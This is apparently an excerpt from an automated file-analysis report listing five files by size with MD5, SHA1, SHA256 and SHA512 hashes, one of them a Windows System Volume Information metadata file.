Filesize
990B
MD50423809b82bcb00a153b8867618ba42f
SHA156e8b23af2d20885acdd0099c07da6117ee9edad
SHA256aa2a5351bf923990a8d3cb3709386a6e4df6c6e5efdbfbe1198456f3a3a19a38
SHA51226364e8496bbe62667faca27c83a2d39b66a2db204bb954fb7874eae577872a5046f6882423c44a72ce7dd11cd3ee49f90e1e04a8f68be3e6d825835b4c17c37
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
202KB
MD524fb548e48a7c771327a8f3aba6f898e
SHA13afad7f09e8827db00552f71137c40459414fc9f
SHA2569e6ef372b96df65eff4358216a545e4eeb4fa5845264359de7de06443bf5fbda
SHA512be1d7f7d40181f3c5d0ab21c3b2fd17043bf26c12b766bf9c6cd183580d73b8b12491862db849cf98740ea6cc92dc05a15c396ca0969bd6ab3431b581cf6169b
-
Filesize
23.7MB
MD58f132b59e66be74dd4c8f8e9a981e183
SHA14dfaf2c445f959245dc2e538de12c7c13f453bdf
SHA25689b22f573a65b6377600ff11726f4b728b2a8e61fc3892c2f90d75f98f7c287b
SHA512f4a5a9474b69b5232a6e7aee7c407fe89425a6d6ff039aaca0c66397e5a6786d0f5dce1b2ce7a2cbe7dc31d3b836ef5511b823bfffa8ce4417807d0d46d52c3b
-
\??\Volume{8a2a71c9-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{ca357b3a-09c5-4ace-a0fd-fd04396c62ff}_OnDiskSnapshotProp
Filesize6KB
MD5a52ae67f38cb9678b96f9371a19cd3cb
SHA1d31d6717ba986aa07abd09648551a25c015df703
SHA25600179d668dc3bcec7da58b5104b461be36bde09454d124c3e5bbff075d1680c6
SHA512c445878a070ceabb49a9aa06b2caf0ebfa67848b1a2151e0bfdfa577228c63b03aed84c37868acb2057dc130929bd5c1f17085d31c46e165c5c9b1b8e0f9a7b4